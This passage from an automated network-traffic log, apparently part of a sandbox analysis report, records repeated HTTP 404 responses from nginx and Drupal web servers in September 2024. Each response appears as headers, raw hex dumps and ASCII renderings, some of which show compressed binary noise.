64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:32:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:34 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privateaccess-control-allow-origin: http://www.groet.onlineaccess-control-allow-credentials: trueaccess-control-expose-headers: truex-drupal-dynamic-cache: UNCACHEABLEcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)vary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-encoding: gzipcontent-length: 4175content-type: text/html; charset=UTF-8server: ApacheData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 0b 23 93 3f b0 47 07 07 08 18 16 f2 29 0e 3a 5a 18 8c 61 5b 03 3a a3 4f 54 b8 c8 61 a4 1c 63 17 b3 0e 3c 46 9c e1 b9 01 76 19 e4 4b 3f 9c 22 1b 34 ea e0 b7 56 10 4c e9 81 ae df de de d6 4c 51 5c f3 fc c9 ef 72 68 fa de 88 d8 f8 6c 1a 10 87 dc 63 53 41 76 4b cc c0 ca c1 9f 20 d7 b4 b0 6d be f2 09 76 4d 7b a6 34 08 fc 10 e7 e0 6f 08 be 9d 7a 7e 90 45 dc 31 f1 0d 31 30 14 2f 5b 80 b8 24 20 c8 86 d4 40 8c cf 8d 5a 5d 22 b2 89 7b 0d 7c 6c 77 34 c2 9a 6b c0 f2 f1 b8 a3 e9 45 13 3e 46 37 1c a6 c6 7e 69 20 98 4d 59 df 8c d3 13 ac df b8 66 cd 21 86 ef 51 6f 1c d4 24 1e 86 5b 72 3a 20 81 8d bb e7 0c 0e b8 5e 00 c6 5e e8 9a e0 8f e0 d8 f7 70 50 3b 73 59 ff f8 50 97 40 b2 c1 9c 22 21 12 d4 c2 98 8d cd c1 26 41 1d Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:34 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privateaccess-control-allow-origin: http://www.groet.onlineaccess-control-allow-credentials: trueaccess-control-expose-headers: truex-drupal-dynamic-cache: UNCACHEABLEcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)vary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-encoding: gzipcontent-length: 4175content-type: text/html; charset=UTF-8server: ApacheData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 0b 23 93 3f b0 47 07 07 08 18 16 f2 29 0e 3a 5a 18 8c 61 5b 03 3a a3 4f 54 b8 c8 61 a4 1c 63 17 b3 0e 3c 46 9c e1 b9 01 76 19 e4 4b 3f 9c 22 1b 34 ea e0 b7 56 10 4c e9 81 ae df de de d6 4c 51 5c f3 fc c9 ef 72 68 fa de 88 d8 f8 6c 1a 10 87 dc 63 53 41 76 4b cc c0 ca c1 9f 20 d7 b4 b0 6d be f2 09 76 4d 7b a6 34 08 fc 10 e7 e0 6f 08 be 9d 7a 7e 90 45 dc 31 f1 0d 31 30 14 2f 5b 80 b8 24 20 c8 86 d4 40 8c cf 8d 5a 5d 22 b2 89 7b 0d 7c 6c 77 34 c2 9a 6b c0 f2 f1 b8 a3 e9 45 13 3e 46 37 1c a6 c6 7e 69 20 98 4d 59 df 8c d3 13 ac df b8 66 cd 21 86 ef 51 6f 1c d4 24 1e 86 5b 72 3a 20 81 8d bb e7 0c 0e b8 5e 00 c6 5e e8 9a e0 8f e0 d8 f7 70 50 3b 73 59 ff f8 50 97 40 b2 c1 9c 22 21 12 d4 c2 98 8d cd c1 26 41 1d Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:37 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privateaccess-control-allow-origin: http://www.groet.onlineaccess-control-allow-credentials: trueaccess-control-expose-headers: truex-drupal-dynamic-cache: UNCACHEABLEcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)vary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-encoding: gzipcontent-length: 4175content-type: text/html; charset=UTF-8server: ApacheData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 0b 23 93 3f b0 47 07 07 08 18 16 f2 29 0e 3a 5a 18 8c 61 5b 03 3a a3 4f 54 b8 c8 61 a4 1c 63 17 b3 0e 3c 46 9c e1 b9 01 76 19 e4 4b 3f 9c 22 1b 34 ea e0 b7 56 10 4c e9 81 ae df de de d6 4c 51 5c f3 fc c9 ef 72 68 fa de 88 d8 f8 6c 1a 10 87 dc 63 53 41 76 4b cc c0 ca c1 9f 20 d7 b4 b0 6d be f2 09 76 4d 7b a6 34 08 fc 10 e7 e0 6f 08 be 9d 7a 7e 90 45 dc 31 f1 0d 31 30 14 2f 5b 80 b8 24 20 c8 86 d4 40 8c cf 8d 5a 5d 22 b2 89 7b 0d 7c 6c 77 34 c2 9a 6b c0 f2 f1 b8 a3 e9 45 13 3e 46 37 1c a6 c6 7e 69 20 98 4d 59 df 8c d3 13 ac df b8 66 cd 21 86 ef 51 6f 1c d4 24 1e 86 5b 72 3a 20 81 8d bb e7 0c 0e b8 5e 00 c6 5e e8 9a e0 8f e0 d8 f7 70 50 3b 73 59 ff f8 50 97 40 b2 c1 9c 22 21 12 d4 c2 98 8d cd c1 26 41 1d Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:39 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privateaccess-control-allow-origin: http://www.groet.onlineaccess-control-allow-credentials: trueaccess-control-expose-headers: truex-drupal-dynamic-cache: UNCACHEABLEcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)vary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-encoding: gzipcontent-length: 4175content-type: text/html; charset=UTF-8server: ApacheData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1c 5d 73 db b8 f1 3d bf 02 65 a7 77 ed 8c 21 4a b2 6c cb 3e 4b 9d c4 51 ec 24 56 ec 3b d9 77 c9 4d 67 34 10 09 89 b0 f9 a1 10 a4 6d f9 7a 8f 7d ee 4c 1f fa d4 99 4e 5f fb 0b fa 7b fa 07 da 9f 50 7c 90 14 f8 25 51 8e e4 e4 a6 ce c4 36 09 2c 16 8b c5 62 77 b1 0b e2 d9 b3 c3 5f 41 08 2e 4e 7a fd 1e 78 d9 7b 71 79 0c 20 ec aa 85 27 67 67 6f 0f c0 d7 56 e0 d8 5f cf eb 5e bd 3e ed 81 77 cf 59 fd e0 f2 f8 b8 37 b8 78 7d f6 6e 70 f0 0c 00 f0 ef bf fe f3 3f ff fa 33 e0 f0 10 5e 9b 74 5c e3 8f b5 e0 96 4c 44 f5 df fe 24 ea 94 d2 04 e9 7f ff fe 97 7f 80 17 bd e3 d7 ef c0 d1 e5 e0 e2 ac 0f 2e 7a fd f3 d3 e7 17 3d 70 76 79 71 7e 79 01 c6 be e7 80 af 0d cf c7 7a 60 61 07 53 dd b3 c9 0d f6 3d 3d c0 ce d4 46 01 2b b1 d1 cc 0b 03 3d dd 49 4c fa cb b3 a3 8b 0f e7 3d 41 02 7b e7 7f 80 8d dc 49 47 c3 ae 06 4c e2 77 34 3b f0 35 40 83 99 8d 3b 1a 84 86 67 7b 3e 84 53 9f 38 c8 9f 41 2b c4 07 cd 7a f3 9b 5c 05 45 41 e8 a3 80 78 ee c1 de fe 6f f2 f5 36 99 58 81 8b 29 3d d8 a9 6b 5d c6 89 43 0b 23 93 3f b0 47 07 07 08 18 16 f2 29 0e 3a 5a 18 8c 61 5b 03 3a a3 4f 54 b8 c8 61 a4 1c 63 17 b3 0e 3c 46 9c e1 b9 01 76 19 e4 4b 3f 9c 22 1b 34 ea e0 b7 56 10 4c e9 81 ae df de de d6 4c 51 5c f3 fc c9 ef 72 68 fa de 88 d8 f8 6c 1a 10 87 dc 63 53 41 76 4b cc c0 ca c1 9f 20 d7 b4 b0 6d be f2 09 76 4d 7b a6 34 08 fc 10 e7 e0 6f 08 be 9d 7a 7e 90 45 dc 31 f1 0d 31 30 14 2f 5b 80 b8 24 20 c8 86 d4 40 8c cf 8d 5a 5d 22 b2 89 7b 0d 7c 6c 77 34 c2 9a 6b c0 f2 f1 b8 a3 e9 45 13 3e 46 37 1c a6 c6 7e 69 20 98 4d 59 df 8c d3 13 ac df b8 66 cd 21 86 ef 51 6f 1c d4 24 1e 86 5b 72 3a 20 81 8d bb e7 0c 0e b8 5e 00 c6 5e e8 9a e0 8f e0 d8 f7 70 50 3b 73 59 ff f8 50 97 40 b2 c1 9c 22 21 12 d4 c2 98 8d cd c1 26 41 1d Data Ascii: ]s=ew!Jl>KQ$V;wMg4mz}LN_{P|%Q6,bw_A.Nzx{qy 'ggoV_^>wY7x}np?3^t\LD$.z=pvyq~yz`aS==F+=IL=A{IGLw4;5@;g{>S8A+z\EAxo6X)=k]C#?G):Za[:OTac<FvK?"4VLLQ\rhlcSAvK mvM{4oz~E110/[$ @Z]"{|lw4kE>F7~i MYf!Qo$[r: ^^pP;sYP@"!&A
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 16 Sep 2024 07:32:42 GMTx-powered-by: PHP/8.3.8cache-control: must-revalidate, no-cache, privatex-drupal-dynamic-cache: HITcontent-language: enx-content-type-options: nosniffx-frame-options: SAMEORIGINexpires: Sun, 19 Nov 1978 05:00:00 GMTx-generator: Drupal 10 (https://www.drupal.org)x-drupal-cache: MISSvary: Origin,Accept-Encoding,User-Agentupgrade: h2,h2cconnection: Upgradecontent-length: 24869content-type: text/html; charset=UTF-8server: ApacheData Raw: 0a 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 44 45 42 55 47 20 2d 2d 3e 0a 3c 21 2d 2d 20 54 48 45 4d 45 20 48 4f 4f 4b 3a 20 27 68 74 6d 6c 27 20 2d 2d 3e 0a 3c 21 2d 2d 20 46 49 4c 45 20 4e 41 4d 45 20 53 55 47 47 45 53 54 49 4f 4e 53 3a 0a 20 20 20 e2 96 aa ef b8 8f 20 68 74 6d 6c 2d 2d 6b 64 73 66 2e 68 74 6d 6c 2e 74 77 69 67 0a 20 20 20 e2 9c 85 20 68 74 6d 6c 2e 68 74 6d 6c 2e 74 77 69 67 0a 2d 2d 3e 0a 3c 21 2d 2d 20 f0 9f 92 a1 20 42 45 47 49 4e 20 43 55 53 54 4f 4d 20 54 45 4d 50 4c 41 54 45 20 4f 55 54 50 55 54 20 66 72 6f 6d 20 27 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 61 79 6f 75 74 2f 68 74 6d 6c 2e 68 74 6d 6c 2e 74 77 69 67 27 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 73 74 79 6c 65 3d 22 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 68 75 65 3a 32 30 32 3b 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 73 61 74 75 72 61 74 69 6f 6e 3a 37 39 25 3b 2d 2d 63 6f 6c 6f 72 2d 2d 70 72 69 6d 61 72 79 2d 6c 69 67 68 74 6e 65 73 73 3a 35 30 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 47 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 44 72 75 70 61 6c 20 31 30 20 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 75 70 61 6c 2e 6f 72 67 29 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 6f 72 65 2f 74 68 65 6d 65 73 2f 6f 6c 69 76 65 72 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 Data Ascii: <!-- THEME DEBUG --><!-- THEME HOOK: 'html' --><!-- FILE NAME SUGGESTIONS: html--kdsf.html.twig html.html.twig--><!-- BEGIN CUSTOM TEMPLATE OUTPUT from 'core/themes/olivero/templates/layout/html.html.twig' --><!DOCTYPE html><html lang="en" dir="ltr" style="--color--primary-hue:202;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:32:48 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:32:50 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 